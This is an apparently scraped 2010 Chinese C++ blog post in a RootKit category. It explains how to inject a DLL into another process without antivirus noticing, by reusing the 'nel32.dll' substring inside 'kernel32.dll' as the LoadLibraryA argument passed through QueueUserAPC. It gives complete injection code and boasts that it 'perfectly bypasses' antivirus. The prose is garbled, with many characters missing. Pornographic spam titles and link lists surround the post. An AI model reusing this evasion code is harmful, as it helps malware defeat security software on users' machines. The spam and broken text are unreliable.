青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品

S.l.e!ep.¢%

像打了激速一樣,以四倍的速度運轉,開心的工作
簡單、開放、平等的公司文化;尊重個性、自由與個人價值;
posts - 1098, comments - 335, trackbacks - 0, articles - 1
  C++博客 :: 首頁 :: 新隨筆 :: 聯系 :: 聚合  :: 管理

繞過主動防御的代碼Inject方法思考

Posted on 2010-02-03 12:49 S.l.e!ep.¢% 閱讀(1084) 評論(0)  編輯 收藏 引用 所屬分類: RootKit
殺軟都hook NtWriteVirtualMemoryNtUserSetWindowsHookAW、NtUserSetWindowsHookE防止代碼注入。

  關于代碼注入Ring3層有:

  l 遠程線程CreateRemoteThread

  l 消息鉤子SetWindowsHookEx

  l Ring3 APC QueueUserApc

  l 修改線程文SetContextThread

  其第三種傳入個param,但求這個param必須目標進程存空間,比較笨重,直接目標進程VirtualAllocEx存,然希望參數入這個存,使WriteProcessMemory函數,而這個函數被hook,所以殺軟容易攔截代碼注入行

  仔細想想,殺軟這種防御失敗!原因個param,攻擊完全沒有必做這么動作去目標進程存空間申存并存,思考以不WriteProcessMemory函數呢?反個合理param,并且這個param目標進程存空間即

  思考,原這么容易啊,哈哈!樂半天~~~

  舉個例子:假設這樣注入

  QueueUserAPC((PAPCFUNC)LoadLibraryA, hThread, (ULONG_PTR)param) ;

  想讓param個“xxx.dll”,就,而且求這個param目標進程存空間

  您想么?哈哈

  答案:直接目標進程搜索個這樣字符串“nel32.dll”就以啦!因“kernel32.dll” 這樣字符串定存,那么“kernel32.dll” 不樣,那就隨便使“nel32.dll”,或“el32.dll”,都啊!最往windows目錄面撂進入個nel32.dll,這樣注入部分殺軟都不能攔截!哈哈!

  段程序,做個試驗,僅測試趨勢,完美繞過!其實殺軟稍測試。。。

DWORD EnumThreadandInjectDll(char *processName,HANDLE hProcess, DWORD dwProcessID,TIDLIST *pThreadIdList)
{
TIDLIST *pCurrentTid = pThreadIdList ;
const char szInjectModName[] = "nel32.dll";
DWORD dwLen = strlen(szInjectModName) ;
  
//////////////////////////////////////////////////////////////////////////
//不目標進程
//直接目標進程搜索出 nel32.dll 這樣字符串 并注入
//////////////////////////////////////////////////////////////////////////
int bufflen=30000;
char *buffer=(char *)malloc(sizeof(char)*bufflen);
DWORD dwNumberOfBytesRead;
DWORD defaultAddress;
//獲得該進程基址
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, dwProcessID) ;
if(!hSnapshot)
{
  printf("CreateToolhelp32Snapshot error!n");
  return 0;
}
MODULEENTRY32 me = { sizeof(me) };
  BOOL fOk =Module32First(hSnapshot,&me);
if(!fOk)
{
  printf("Module32First error!n");
  return 0;
}
  for (; fOk; fOk = Module32Next(hSnapshot,&me))
  {
  printf("%s process module name = %sn",processName,me.szModule);
    // 得進程模塊基址
  if(stricmp(me.szModule,processName)==0)
  {
  defaultAddress=(DWORD)me.modBaseAddr;
  printf("%s process module base = 0x%08Xn",processName,defaultAddress);
  break;
  }
  }
//搜索
if(!ReadProcessMemory(hProcess,(LPCVOID)defaultAddress,buffer,bufflen,&dwNumberOfBytesRead))
{
  printf("ReadProcessMemory error!n");
  return 0;
}
for(int i=0;i<bufflen-dwLen;i++)
{
  if(strnicmp(buffer+i,szInjectModName,dwLen)==0)
  {
  printf("found nel32.dll already!... %sn",buffer+i);
  while (pCurrentTid)
  {
   HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, pCurrentTid->dwTid) ;
  
   if (hThread != NULL)
   {
   //
   // 注入DLL指定進程
   //
   QueueUserAPC((PAPCFUNC)LoadLibraryA, hThread, (ULONG_PTR)(defaultAddress+i)) ;
   }
  
   printf("TID:%dn", pCurrentTid->dwTid) ;
   pCurrentTid = pCurrentTid->pNext ;
  }
  break;
  }
}
  
return 0 ;
}

青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品
  • <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>
    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>
            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>
            久久aⅴ乱码一区二区三区| 亚洲欧美激情在线视频| 国产伦精品一区二区三区视频黑人 | 欧美日韩视频免费播放| 老牛影视一区二区三区| 国产精品剧情在线亚洲| 亚洲精品久久久久久久久久久久| 狠狠色丁香婷婷综合久久片| 亚洲午夜免费视频| 夜夜嗨av色一区二区不卡| 久久婷婷国产麻豆91天堂| 欧美一区二区三区久久精品茉莉花 | 免费高清在线视频一区·| 国产精品日韩欧美一区二区三区 | 免费日韩成人| 国产有码在线一区二区视频| 亚洲欧美精品伊人久久| 亚洲女ⅴideoshd黑人| 欧美日韩成人综合在线一区二区| 欧美成人一区二区| 在线观看亚洲专区| 久久一区二区三区超碰国产精品| 久久―日本道色综合久久| 国产三区精品| 欧美中文字幕第一页| 久久久久久久波多野高潮日日| 国产精品一区二区三区观看| 亚洲欧美日韩在线| 久久精品在线观看| 伊人久久久大香线蕉综合直播| 久久国产精品99精品国产| 久久精品99久久香蕉国产色戒| 国产午夜精品一区二区三区欧美| 亚洲欧美第一页| 久久免费高清视频| 在线观看日韩av| 欧美成人按摩| 日韩午夜精品| 欧美一级大片在线观看| 国模精品一区二区三区| 久久精品人人做人人爽电影蜜月| 美日韩丰满少妇在线观看| 亚洲黄色片网站| 欧美精品一区二区三区蜜桃| 一区二区三区欧美激情| 久久久久久9| 亚洲人成网站精品片在线观看| 欧美日韩日本视频| 亚洲综合日本| 欧美gay视频激情| 一二美女精品欧洲| 国产精品一区免费在线观看| 久久精品一区二区三区四区| 亚洲国产精品福利| 午夜综合激情| 亚洲大黄网站| 国产精品第三页| 欧美综合二区| 亚洲欧洲日本在线| 久久久国产视频91| 日韩视频免费| 国产一区二区三区四区在线观看| 欧美黄色日本| 性xx色xx综合久久久xx| 亚洲片在线观看| 久久国产一区二区| 一区二区三区高清| 加勒比av一区二区| 国产精品家教| 欧美大片免费久久精品三p| 亚洲欧美日韩精品久久奇米色影视 | 久久不射网站| 99在线精品视频在线观看| 国产字幕视频一区二区| 欧美色道久久88综合亚洲精品| 久久精品亚洲一区二区| 一区二区免费在线观看| 你懂的视频欧美| 欧美一区二区三区免费观看| 一个人看的www久久| 激情久久久久久久| 国产伦精品一区二区三区视频孕妇| 欧美激情精品久久久| 久久国产一区| 亚洲宅男天堂在线观看无病毒| 亚洲国产精品久久久久秋霞蜜臀| 久久久久久综合| 香蕉久久一区二区不卡无毒影院| 一区二区高清视频在线观看| 亚洲国产精品一区二区第四页av| 国产午夜精品全部视频在线播放| 国产精品sss| 欧美日韩国产小视频在线观看| 免费看的黄色欧美网站| 久久久999| 久久激情一区| 欧美在线视频不卡| 午夜欧美视频| 欧美亚洲一级| 欧美一二三区精品| 午夜欧美视频| 欧美一区二区在线视频| 亚洲欧美成aⅴ人在线观看| 妖精成人www高清在线观看| 亚洲九九精品| 一本久道综合久久精品| av成人福利| 一本久久精品一区二区| 一区二区三区蜜桃网| 一区二区三区四区在线| 亚洲一区二区三区中文字幕在线| 一区二区三区视频在线观看 | 亚洲一区在线视频| 亚洲免费在线精品一区| 香蕉久久夜色精品| 久久国产欧美精品| 久久久久久久综合色一本| 久久久中精品2020中文| 蜜桃av一区二区三区| 欧美国产精品专区| 欧美日韩综合| 国产精品视频免费在线观看| 国产欧美日韩不卡免费| 激情综合激情| 亚洲精品乱码视频| 亚洲一二三四久久| 久久久成人网| 欧美激情在线免费观看| 99精品视频一区| 亚洲欧美日韩国产综合| 久久嫩草精品久久久精品| 欧美二区乱c少妇| 国产精品久久久久久久午夜片| 国产一区二区中文| 最新高清无码专区| 亚洲男人的天堂在线| 久久亚洲影音av资源网| 亚洲国产精品免费| 亚洲一区二区三区色| 久久精精品视频| 欧美美女bbbb| 国产日韩欧美麻豆| 亚洲人成小说网站色在线| 亚洲一级网站| 美女福利精品视频| 中文精品视频| 久久久久久久一区二区三区| 欧美黄污视频| 国产手机视频精品| 一区二区三区精品视频| 久久理论片午夜琪琪电影网| 亚洲人体1000| 久久免费国产精品1| 国产精品久久久久久福利一牛影视| 国内精品伊人久久久久av影院| 亚洲精品黄色| 久久久99精品免费观看不卡| 亚洲国产欧美精品| 久久精品中文| 欧美亚韩一区| 亚洲美女黄网| 久久久久se| 亚洲一区不卡| 欧美日本一区| 亚洲激情在线观看视频免费| 亚洲午夜精品福利| 快射av在线播放一区| 中文国产一区| 欧美激情亚洲另类| 尤物精品国产第一福利三区| 欧美夜福利tv在线| 亚洲人成在线影院| 噜噜噜91成人网| 国产一区二区三区四区hd| 亚洲夜间福利| 亚洲国产日韩一区| 久久久久综合| 国产欧美一区二区三区另类精品| 9人人澡人人爽人人精品| 欧美国产精品v| 欧美亚洲在线观看| 国产精品美女久久久久久免费| 日韩亚洲综合在线| 最新国产精品拍自在线播放| 久久久久久久成人| 国产性天天综合网| 欧美影院久久久| 亚洲天堂视频在线观看| 欧美日韩国产精品一区二区亚洲| 亚洲精品久久久久久久久久久久久| 另类天堂av| 久久综合伊人| 亚洲第一网站| 欧美激情精品久久久久久黑人| 欧美一二区视频| 国内一区二区在线视频观看 | 亚洲理伦电影| 欧美日韩另类丝袜其他| 99视频在线精品国自产拍免费观看| 亚洲国产另类精品专区|